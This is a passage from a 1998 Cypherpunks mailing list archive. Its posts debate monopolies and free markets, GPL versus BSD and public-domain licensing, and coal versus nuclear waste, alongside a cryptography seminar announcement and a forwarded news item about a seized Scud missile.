gets a bright idea. He acts on that idea and starts a business. In order for
that business to grow and prosper at some point employees must be hired.
Those employees learn the business and some point one or more decide that
since there are more people wanting widgets than there are widgets being
made it looks like a good time to quit. That ex-employee starts up a
company. The original employer has no way to prevent this short of overt
violence, no laws or protective agents have been violated because there is
no 3rd party to act as guarantor to the employment contract or the
intellectual property rights. Now we have two companies making widgets.
These products are consumed and resupplied at a profit and both companies
(it is easy to extend this to n-parties so I'll stay with two for brevity)
continue to grow until market saturation. Now some folks will claim the
employer can impliment a limited access policy to the technology and product.
This strategy will not work. As another potential supplier I put out an add
asking for anybody who *used* to work in that industry to come by for a job.
I hire them, drain their brain, and impliment my competitors system. Once the
market saturates there isn't enough 'spare' money floating around to stay in
business, hence new businesses in that field don't start up unless another
fails unexpectedly; if its expected other competitors will begin bidding
economicaly for those potential new customers. The existing employers are
always trying to hire their competitors so there is a constant motivation to
defect from the employees perspective (ala computer industry).

Imagine the impact of these sorts of dynamics on banks and the issuance of
effective currencies and how that impacts travel and at-a-distance business
(such as across the big pond). Even such technologies as e$ won't solve this
problem because for one variety to have a chance at the market it must be
widely respected, implying a very large share of the market approaching
mono-e$ token saturation. So we create a monopoly in our rush to eliminate
monopolies via technology.

Monopolies are a function of doing business and not any political or
mathematics aspect. It's axiomatic in nature. Monopolies themselves,
something we haven't even touched on,  have both positive and negative
characteristics. These characteristics can in fact be described to a very
good degree of precision. Now if there were a mechanism to move a more
rational and experience based set of laws and regulations into business then
we might make some progress toward creating a society (due to moderated
market activity - by a *impartial* 3rd party) where investment in technology
and its application toward automation creates a situation where everyone
invests a sufficient amount of income to retire in a very small number of
years.

Another point to be made is at no time have I required these various
inter-active producers and consumers to be in lock step or have been created
at the same time. Nor do they, in principle or practice, have a requirement
for such things as instant market change propogation and rational
participants, etc. Those issues are irrelevant except early in human
history when these sorts of issues are intitialy introduced into a culture.
If people can't fulfill one desire, they'll fulfill another. The result is
that the same base set of human emotions and desires, expressed through a
cultures bias, that varies widely in content, context, and expression, will
in fact find a way to express the same basic sets. What most economists do
is vastly underestimate the range of that those individual members.

The major short-fall with anarchistic or free-market models is that they
have faulty comprehension of a workable concept of a contract. This contract
represents a major constituent of what holds any society (which I believe
we'll all agree is a requirement for an economy) which is trust in the other
members, that they will do what is expected at the right time. In these
sorts of 2-party systems there can't be an expectable set of reactions. The
contract exists from the time the consumer approaches the producer asking
for a price, till the time the consumer has taken possession of the object
of desire and the producer has their money. At that point, there is no
warranty, no 3rd party to enforce any sort of liability, etc. Because of
this the business world is best described by caviat emptor. You bought what
you got. Now consider the Prisoners Delima, under what conditions does a
prisoner go along with the jailer, or tries to escape (not play by the
rules, whatever they may be - in this case the contract between the
parties). The maximal payback for the prisoner is to go along until the
jailer is lulled into a false sense of security. And then defect. This is
wired into human genes, everybody does it because that is how we survive as
a group in the wild. People as a whole and as individuals don't mind
stretching the rules, it's just a question of what rules and how far.

> 	B) a competitor emerges that manages to meet the entire markets
> desires for goods and services in such a way that profits are so thin as to
> not attract competion.

Not *a competitor*, only that the total number of competitors in a given
market can and do meet the market needs. At this point the growth rates of
the individual business strategies begin to emerge and high efficiency and
long-lived strategies begin to gain the upper-hand. As time goes by
businesses either die and are replaced by consumption or else they merge to
create a new structure. The major featues of that structure are that it has
potential for long-lived behaviour and it reduces the management overhead,
and potentialy the work force requirements (but that's icing on the cake).
At that point there will be a merge because both sets of competitors want to
make more money, that is their sole reason for existance.

> 	(1) can be effectively ignored, it is a localized (in time)
> condition that the market will usually remedy.

Is a totaly false conjecture not born out by history or theory.

> 	I have maintained that Monopolies in ANY market large enough to
> accept competition (i.e. larger than one or two purchasers) cannot continue
> to exist (in fact would have a hard time coming into existence) without
> some sort of government influence.

And I have yet to see an explanation expressed in market dynamics that
describes how this supposed process works. Phloegestron and ether were great
ideas until somebody tried to measure them...

Whew. I've about had my fill of this topic for the time being....

Adios mi amigos!


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 9 Oct 1998 08:31:30 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810062119.QAA09408@einstein.ssz.com>
Message-ID: <v0401170db2430364a789@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:56 AM -0500 10/8/98, James A. Donald wrote:
>At 04:19 PM 10/6/98 -0500, Jim Choate wrote:
>> Who said anything about 'artificial'? You have a sneaky
>> habit of sticking terms in there where they don't go hoping
>> somebody won't catch it. We're talking a free-market, there
>> are *only* two participants; provider and consumer. If I
>> allow 'artificial' in there then there is the explicit
>> assumption that a third party is now involved. I won't
>> accept a bastardization of free-market in that manner.
>
>Then your argument that free markets lead to monopoly collapses.
>
>You cannot have monopoly (in the sense of the power to extract monopoly of
>profits) except by state intervention as has been proven by experience time
>and time again.
>
>You have been unable to provide any examples of monopolies except those
>created by state intervention, such as the railaways, and those existent
>soley in your fevered imagination, such as the garment industry.
>

	Given that the textile/garment industry is often one of the first
and loudest pro-tarif voices, there might be a government manipulation
arguement there as well.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent.
Inc.::petro@playboy.com::petro@bounty.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 08:45:49 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810090031.TAA21986@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Thu, 8 Oct 1998 16:14:32 -0700 

> The Mafia has had two primary characteristics:
> 
> a) the use of force

not necessarily.

> b) trade in elicit and prohibited goods and services

not necessarily.

What the La Familia represents in Italian social history is a concentration
of resources within a geographic region. They were the 'law of the land'.
There was no need for violence or any other covert economics. As those
groups got bigger and interacted more with each other conflict arose.
This conflict was the primary spark in the creation of the 3rd party that
hadn't existed prior to this time (note that the market exists before the
'government' per se). The period of time to pay particular attention to in
Italy's particular case is when the city states began to coalesce into what we now term Italy. This
is a good example because the mountains in Northern Italy acted as barrier
to outside influence to a certain degree and the spine of the boot forced
life to focus on the sea coast. This made maritime trade and it's speed
advantage over foot or hoof obvious. It also allowed a larger geographic
area to enjoy a nearly homegenous culture.

What is really interesting is that so many cultures have these sorts of
organizations. Consider the growth of the Tongs in China with the loss of
the concept of tribe within general Chinese culture. Also interesting is
that economists as a general population doesn't study these periods to any
degree worth mentioning. Historians do however.

> Unless you can claim a reference to a Mafia at some time and place that
> had neither characteristics and a market which they monopolized which
> lacked any other intervention, then this all is utterly irrelevant to
> the discussion at hand.

Not at all, as demonstrated above.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 9 Oct 1998 11:00:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810080430.AAA01120@snark.thyrsus.com>
Message-ID: <3.0.5.32.19981008194226.008cfdc0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Accordingly, I urge you not to encourage an artificial split between 
>> the cypherpunks and the open-source community.  Your licensing argument
>> is not with the open-source community as a whole, it is very
>> specifically with the partisans of the GPL.


- Cypherpunks want to maximize distribution and use of good crypto.
Access to source for any product you use is necessary, 
primarily so you can tell if it has backdoors, weak crypto,
bad implementations, known bugs, previously unknown bugs,
and similar problems that are easiest to detect when
lots of people look at the source code.  

Secondarily, unencumbered source code is easier to include
in products, whether they're public-domain, commercial,
freeware, Genuinely RMS-Approved Free Software (r,tm,patpend),
careware, Greedy Hoardware, or whatever, 	and 
the easier some code is to include in a product,
the more likely it is to get used.  In particular, if using
some code requires paying money to its authors, that makes it
hard to include in low-priced products and harder in free products.
If using the code requires changing the user's business model,
it's less likely to get used, though the Library versions of
the GNU license are much easier to use than the full GNU Public Virus,
and almost anything is easier to use than Patented Algorithms
Only Licensable From David Chaum.

These two issues fit together - secret algorithms
and secret code lead to junk like MS PPTP or GSM A5 which
totally collapse when examined by professionals, and even
with available source, there are bugs that can hide for a long time,
so the more people checking out a system, the better.

Some cypherpunks produce mostly free or Free software, some sell theirs
for money while hoarding what they can, some work for tax-subsidized
universities where publishing work is critical.

- Open Source proponents differ on the tactics they think are most effective
in making it possible for anyone to use source, from PD to GNUware.

[We at the People's Front For Open Source don't believe in religious wars,
unlike those HERETICS over at the Open Source People's Front, who believe
that the best way to get everybody to open their source is to give away
good source code only to virtuous people who agree to give away _their_
source code under the same conditions, instead of giving it away
untainted by even the recognition of the sin of code hoarding like we do.:-]

To the extent that openness-promoting tactics interfere with use of good code,
they act against cypherpunk goals, though the same can be said about
license-revenue-promoting tactics and other attempts to control users.

Most of us in both overlapping camps disapprove of software patents, 
and patents has done almost as much as the NSA to impede crypto deployment, 
but there are some cypherpunks who have them, and some who believe that 
patent and copyright _have_ had their intended benefit, 
which is to encourage authors and inventors by
making it easier for them to make money from their work.

I had one interesting discussion with RMS in which we ended up agreeing
that if software patents only lasted 5 years instead of 20,
they'd still be bad but we could more or less live with them,
because that would reduce the extent to which they interfered with
programmers using techniques, whether the programmer was using
a published patented technique or had reinvented it independently
and missed it when doing literature searches before publishing.



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 09:07:40 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810090053.TAA22127@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 19:06:02 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> 	Given that the textile/garment industry is often one of the first
> and loudest pro-tarif voices, there might be a government manipulation
> arguement there as well.

They are now, but your use of an example after the market was regulated to
argue that the behaviour of the market is due to being regulated is circular.

The garment industy wasn't *always* regulated. Prior to the early 1900's
they operated carte blanche regarding regulation. 16-20 hr days, 6 year old
employees, no insurance, etc., etc. At some point after the turn of the
century the social climate changed in such a way that these sorts of
behaviours became unacceptable. It could have been something as simple as a
series of newspaper articles that set it off. All that was required was that
enough employee/consumers figured the shell game out and screamed bloody
murder about it. You want to know what sets government off? It's the
realization by the constituancy as a whole that their collective suffering
isn't singular.

A more recent example, and local to anyone in the US is the air conditioning
repair industry. At one time prior to the late 70's and early 80's a license
from the state or city to specificaly operate a air conditioning service
industry wasn't needed. You simply got a regular old business license and a
pick-up. The abuses and failures of the industry led to enough noise and
complaints to the government to take a look into the industry. It's what
always happens, an industry goes along until it gets big enough to be
noticed by larger business. What after all is government but a form of
business designed to regulate other businesses and activities...

There was no government. Then there were many governments. Then the
governments have fight and reduce the number of governments. The remaining
governments move into areas that other governments don't or can't claim
effectively. Then each government exploits its resources until it's ready
for another go around.

The issue is human nature and not politics, economics, physical force, etc.

It's about power and not freedom. Power means you survive another day.
Freedom just means you get another shot at it.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Fri, 9 Oct 1998 04:15:36 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810081602.LAA17602@einstein.ssz.com>
Message-ID: <361D1967.87B558B0@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> > 
> > Date: Thu, 08 Oct 1998 14:47:34 +0000
> > From: Michael Hohensee <mah248@is9.nyu.edu>
> > Subject: Re: I thought of an initialy regulated industry!... (fwd)
> 
> > The latter does not necessarily follow from the former.  Consider the
> > example of natural gas and gasoline.  You don't get to conclude your
> > argument that easily! :)
> 
> And you don't get to try such short ones either....
> 
> What specificaly is there about the relationship between natural gas and
> gasoline that leads you to believe that the comparison of lethality between
> the waste products of a coal plant vurses a nuclear plant is such that the
> waste of a nuclear plant is more lethal because there is more toxic
> byproduct and it is in higher concentrations?

Absolutely nothing.  That's my point, not yours --or at least not the
point you made in your previous post.  I had assumed that the flaw in
your previous statement was so obvious that my fairly simple example
would make it crystal clear to you, but it appears that I was
incorrect.  Let me try again.

You said:

> A 1000MW coal plant produces approx 300,000 tons of waste product per year.
> A nuclear plan produces .5. This means the concentration of the chemicals in
> the coal plant are much lower by many orders of magnitude than the nuclear,
> hence making the nuclear waste more toxic by a great deal.

And I say:

This is not a valid argument.  You are saying that since the volume of
nuclear waste is so much less than the volume of the waste produced by a
coal plant, "the concentration of the chemicals in the coal plant [is]
much lower by many orders of magnitude than [that of] the nuclear
[plant]."  For one thing, this comparision is entirely meaningless,
since the waste from coal and nuclear plants is entirely different,
comparing their "concentrations" is impossible.

Of course, what you really meant to refer to was the concentration of
toxic chemicals in the aforementioned waste products.  Yet even your
implied argument is flawed.  You are assuming that there is a constant
unit amount of toxins produced per unit of power generated.  This is an
entirely baseless claim, and is easily refuted.  For example, take the
case of natural gas and gasoline.  Burning gasoline yields carbon
dioxide, water, and various pollutants.  When you burn natural gas, on
the other hand, you get carbon dioxide and water.  Clearly, there is no
power:toxicity ratio at work here.

Take it further. Burn hydrogen.  You get water.  Hydrogen produces much
more energy per unit mass burned than gasoline, yet produces no toxins.

Now, is it clear why the statement you made above is nonsensical?

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 09:14:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Something else about 'freedom'... (fwd)
Message-ID: <199810090100.UAA22202@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Oct 1998 16:07:48 -0700
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Something else about 'freedom'...

> Isn't this the "kill the unbelievers" scenario? Old and revered
> behavior. Tribal. Elemental.

Absolutely. It's burned into everyones genes so deep we couldn't escape it
if we wanted to because it means escaping from ourselves, our very nature.
What defines what we are collectively.

> I don't think 'freedom' means 'anarchy.' 

I certainly hope not.

> Nor does 'anarchy' necessarily mean 'violent lawlessness.' 

Perhaps if we discuss Vulcans. People are people and people use violence and
coercion *because* they are social animals.

Further, anarchy per se unfortunately doesn't describe any mechanism that
can demostrate an expectation that violence is not a viable long term
option. It works.

> And 'rule of law' does not mean 'safety and security.' 

It means an expression of a commen culture through some mechanism. Living
under a 'rule of law' is no less oppressive than any other sort of dictator.

> As strong as the need for order is, so is the need for chaos. Remove
> either and we lose. 

Exactly why an anarchy won't work, it doesn't even attempt to moderate
either behiour and further imposes no necessarily negative result from the
use of violence and coercion. Now if a nice little girl comes up against a
biker and there ain't no cops around, never was, and never will be - who do
you expect to win that argument?

> I think freedom comes from order and knowing what to do with that
> freedom comes from chaos. 

Freedom comes from understanding what one can do standing alone, naked, in
the middle of a wilderness. Everything else is a compromise of that.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 09:31:55 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199810090115.UAA22377@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) 
> Date: Thu, 08 Oct 1998 21:02:23 -0400
> From: "Perry E. Metzger" <perry@piermont.com>

> As entertaining as literary deconstruction can be, what is
> interesting here is not what Juliet meant, but what Perry Metzger
> meant in quoting Juliet.

Which to have *any* impact implicity requires a commen understanding of what
Juliet was saying within the context of human society and *not* personal
ego. From that point it's only a question of what literary technique (eg
irony or allegory) was Perry the person using. That technique will define
the constraints on what Perry can say, not Perry's desire to say anything in
particular.

It will always come back to what the base definitions of a word are in a
given language-culture milieu. Yes you can play with it but *only* within
the context of that language. To do otherwise breaks the syntax-symantics
connection and creates another language entirely (or more likely gibberish).


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@gnu.org>
Date: Fri, 9 Oct 1998 08:45:02 +0800
To: shamrock@netcom.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <Pine.SUN.3.91.981007180953.11287B-100000@netcom4>
Message-ID: <199810090023.UAA02157@psilocin.gnu.org>
MIME-Version: 1.0
Content-Type: text/plain



The SSLeay license is not a BSD-style license.  The BSD license is not
a typical non-copyleft free license; it has a particular problem.  For
an explanation, see http://www.gnu.org/philosophy/bsd.html.

If you want to release a program as non-copylefted free software,
please use the X11 license, not the BSD license.  The X11 license is
the best of these licenses.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@gnu.org>
Date: Fri, 9 Oct 1998 08:41:42 +0800
To: perry@piermont.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810080556.BAA02511@jekyll.piermont.com>
Message-ID: <199810090024.UAA02187@psilocin.gnu.org>
MIME-Version: 1.0
Content-Type: text/plain



Since you've quoted Juliet, let's look at what she is really saying.

Your topic is terminology and whether it matters, but Juliet has other
concerns on her mind.  She uses Romeo's family name as a figure of
speech, a stand-in for his family.  When she says his name is
unimportant, she really means that his family ties should be
unimportant.

To make her meaning clear (once we decode the figure of speech),
Juliet depends on our knowing clearly what "Montague" refers to.  She
depends on the meanings of words, and names, in order to make her
point, even when she uses the meanings indirectly.  All speech does.

When you use words that have meanings, your choice of words determines
what you say.  Consider "pro-life" and "anti-abortion": they are used
to refer to the same people, but say very different things about them.
When you speak about them, your choice of terms will communicate an
opinion.  If you care about the abortion issue, you probably care
which opinion you convey.

It's the same for "open source" and "free software".  They refer to
the same software, but say very different things about it.  So how
about giving people an accurate idea of what I say?  Even if you don't
agree with me, you can still do that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@gnu.org>
Date: Fri, 9 Oct 1998 08:55:59 +0800
To: rick@campbellcentral.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810071026.GAA20270@germs.dyn.ml.org>
Message-ID: <199810090025.UAA02286@psilocin.gnu.org>
MIME-Version: 1.0
Content-Type: text/plain



    Public Domain status denotes more freedom than GPL.  It allows all of
    the freedom of GPL and in addition, it allows the freedom of making
    proprietary modifications.

Public domain gives person P the ability to make modified versions and
give users no freedom in using them.  The result is that people in
general have less freedom.

This might seem like a paradox: you give people "more freedom", but
they end up with less.  How can that be?  It has to do with stretching
the word "freedom" to include the ability to control other people.
That kind of "freedom" tends to leave other people with less freedom.
What happened with the X Window System illustrates this unambiguously
(see http://www.gnu.org/philosophy/x.html).

One way to avoid the paradox is to distinguish between freedom and
power.  Freedom is being able to decide your own activities and
choices that affect mainly you.  When someone can decide other
people's activities, or choices that affect mainly others, that is
power, not freedom.

With this definition, the paradox goes away.  Copyright is a power,
not a freedom.  Copyleft, by blocking this power, protects freedom.
The GNU GPL guarantees basic freedom for all users, which otherwise
they will tend to lose.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 9 Oct 1998 09:16:37 +0800
To: mac-crypto@vmeng.com
Subject: WPI Cryptoseminar, Wednesday, 10/14
Message-ID: <v04011791b24309626ab0@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: goya.WPI.EDU: christof owned process doing -bs
Date: Thu, 8 Oct 1998 18:19:49 -0400 (EDT)
From: Christof Paar <christof@ece.WPI.EDU>
To: "WPI.Crypto.Seminar":;
cc: DCSB <dcsb@ai.mit.edu>
Subject:  WPI Cryptoseminar, Wednesday, 10/14
MIME-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Christof Paar <christof@ece.WPI.EDU>


       WPI Cryptography and Information Security Seminar

               Prof. David Finkel, CS Dept., WPI

   PERFORMANCE AND SECURITY IN WEB-BASED ELECTRONIC COMMERCE


                       Wednesday, October 14
                         4:00 pm,  AK 108
                    (refreshments at 3:45 pm)


This talk reports on the results of a performance evaluation of a testbed
electronic commerce application on the World Wide Web.  The study measured
the performance of the system using different levels of security, and offers
some insights into the performance costs of security for such an
installation.  In addition, we discuss the performance implications of
different implementation strategies.  The work represents a joint effort by
researchers from WPI and Stratus Computer, Inc.


---------------------------------------------------------------------------
---------------------------------------------------------------------------

DIRECTIONS:

The WPI Cryptoseminar is being held in the Atwater Kent building on the
WPI campus. The Atwater Kent building is at the intersection of West and
Salisbury Street for those coming from outside. Directions to the campus
can be found at http://www.wpi.edu/About/Visitors/directions.html


TALKS IN THE FALL '98 SEMESTER:

8/12  Kris Gaj, George Mason University
      Quantum Computers and Classical Supercomputers as a Threat to
      Existing Ciphers.

10/6  Christof Paar, WPI
      Report on AES

10/14 David Finkel, CS Dept., WPI
      Performance and Security in Web-based Electronic Commerce

10/28 Thomas Blum, WPI
      Efficient FPGA Architectures for Public-Key Algorithms

[other talks to be announced]


See also http://ece.WPI.EDU/Research/crypt/seminar/index.html for
abstracts of some of the talks.


MAILING LIST:

If you want to be added to the mailing list and receive talk announcements
together with abstracts, please send me a short mail. Likewise, if you want
to be removed from the list, just send me a short mail.


Regards,

Christof Paar


*************************************************************************
Christof Paar                   http://ee.wpi.edu/People/faculty/cxp.html
Assistant Professor             email:  christof@ece.wpi.edu
Cryptography Group              phone:  (508) 831 5061
ECE Department, WPI             fax:    (508) 831 5491
100 Institute Road
Worcester, MA 01609, USA
*************************************************************************


For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@kizmiaz.dis.org>
Date: Fri, 9 Oct 1998 12:02:42 +0800
To: DC-Stuff <aaa-list@access.org.uk>
Subject: A Scud in California!
Message-ID: <Pine.BSI.3.95.981008202424.17213B-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



>From another one of the several lists I'm on, I figured someone
might know who the new pseudo-proud owner of a fully-operational
SS-1C Scud missle *WITH* moblie launcher is...

Cheers!

William Knowles
erehwon@dis.org


 Intelligence, N. 86, 5 October 1998, p. 12


 USA

 THE SCUD THAT DIDN'T GET AWAY

 At "Intelligence", we're taking bets that you won't hear about
 the unidentified British firm which used an unnamed British
 freighter to import a fully-operational SS-1C Scud missile --
 complete with launcher, but missing its warhead -- into the
 United States.  According to a 25 September report in the
 "Washington Times", special investigators from HM Customs and
 Excise have been asked to determine how paperwork sent with the
 system came to be falsified, but they're probably going to run
 into ... the Pentagon because the Scud missile and its mobile
 transporter-erector launcher were seized on 2 September by the
 US Customs Service at Port Hueneme, California, about 56 km.
 north of Los Angeles and ... next door to the US Navy Point
 Mugu Pacific Missile Range, and ... the closest military port
 to the Vandenburg US Air Force Base where all classified US
 military launches take place.

 The Russian-designed, Czech-manufactured missile system was
 licensed for importation by the Bureau of Alcohol, Tobacco and
 Firearms (ATF), but ... it was wrongly described.  Although
 addressed to a wealthy -- but so far unnamed (and bets are he
 will never be named) -- US citizen, who is regarded as a bona
 fide weapons collector rather than an arms dealer, the missile
 system had not been made inoperable as required by import
 rules.  This is, of course, of interest to the Pentagon.  "This
 is a full-blown missile," stated John Hensley, a senior agent
 of US Customs Service in Los Angeles.  "The only thing missing
 is the warhead."  The launch chassis is a MAZ-543 truck,
 commonly used by former Soviet and Warsaw Pact forces.  "The
 guidance system was totally intact and the engine was ready to
 go," Mr. Hensley said.  "All you needed to do was strap on a
 garbage can full of C-4 high-explosive and you had a weapon."
 The guidance system and engine would, of course, be of intense
 interest to Pentagon intelligence, and the Israeli Mossad,
 particularly if the weapon is a later date or recent model.

 Hensley said the buyer, who lives in Palo Alto, had previously
 purchased a Scud missile that had been properly demilitarized.
 Under US law, such weapons may be imported, provided they are
 first cut up with a blowtorch so that they can never be
 reassembled.  But in this case, in an effort to fool customs
 officials, a photograph of the first -- cut up -- missile to be
 imported was attached to the illegal -- intact -- system, which
 was seized on 2 September.  If the "buyer" really wanted his
 missile, then the San Francisco Bay, which Palo Alto overlooks,
 is a much better port of entry.  Bets at "Intelligence" are
 also out on the "buyer" being associated with the military-
 funded Stanford Research Institute (SRI) or similar Pentagon-
 dependent firms in nearby Silicon Valley.

 COMMENT  --  The SS-1C Scud is a liquid-fueled missile which is
 among the most widely deployed weapons in the world.  It is in
 service in 16 nations.  Iraq's military forces were able to
 extend the range of the missile ("with baling wire and
 plywood", according to certain specialists), and used it
 extensively during the 1991 Gulf war.  International transfers
 of such missiles, which normally have a range of 300 km., are
 banned under the Missile Technology Control Regime.  Although
 the major media suggested the seizure would embarrass the
 Clinton administration, currently engaged in a major
 international diplomatic effort to halt exports of weapons of
 mass destruction and missile-delivery systems by Russia and
 China to the Middle East, it would seem more likely that the
 affair will "drag out indefinitely" in a California court,
 unless an appropriate "buyer" can be "sacrificed" publicly.

 ---------------------------------------------

 Olivier Schmidt,
 Editor of "Intelligence"
 <oschmidt@francenet.fr>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 9 Oct 1998 04:36:37 +0800
To: fod@brd.ie
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <361CE49F.C858A2CE@brd.ie>
Message-ID: <199810081945.UAA14149@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Frank O'Dwyer writes:
> I'm familiar with C2Net. If Stronghold is any good, that is because
> C2net and/or the Apache team know what they are doing, not just because
> they picked up a free SSL library on the net. It's easy to build
> insecure products on good crypto, and many other companies are busy
> doing just that. 

Perry recently posted a summary of his views on the appropriateness of
GPL vs BSD vs other licenses for achieving various aims, "free
software" under the GNU meaning, vs crypto software deployment.  I
found Perrys summary to be the clearest on the topic so far.

You appear to be arguing with another aim in mind.  You seem to be
arguing that the primary goal should be to have best security, from
the outset.  ie one gets the impression from reading your previous two
posts that you consider ultimate security more important than
deployment.  If this is what you are saying, I disagree.

As I argued further down, I think cypherpunk type goals are better met
my getting people to deploy first, then if they bodge it to encourage
them to fix it, and I gave the example of the Netscape RNG weakness
which was very quicly fixed once it was found:

> > Cypherpunks also get involved in breaking crypto, and this is usually
> > enough to get massively commercially deployed strong crypto with
> > unintentional flaws converted quickly into massively deployed crypto
> > without the flaws.  eg. Netscape's random number generator weakness,
> > which netscape fixed immediately.
> 
> That's condescending and irrelevant. Did anyone ever fix web spoofing?

Which is not in the least condescending or irrelevant as it gives an
example showing that having what turns out to be less than perfect
security can be fairly quickly remedied.  And security is hard, even
competent people make mistakes.  The important thing is to admit and
quickly fix such mistakes.

I've taken your comments on web spoofing to another post.

> Then I guess you agree that closed-source deployment is neither
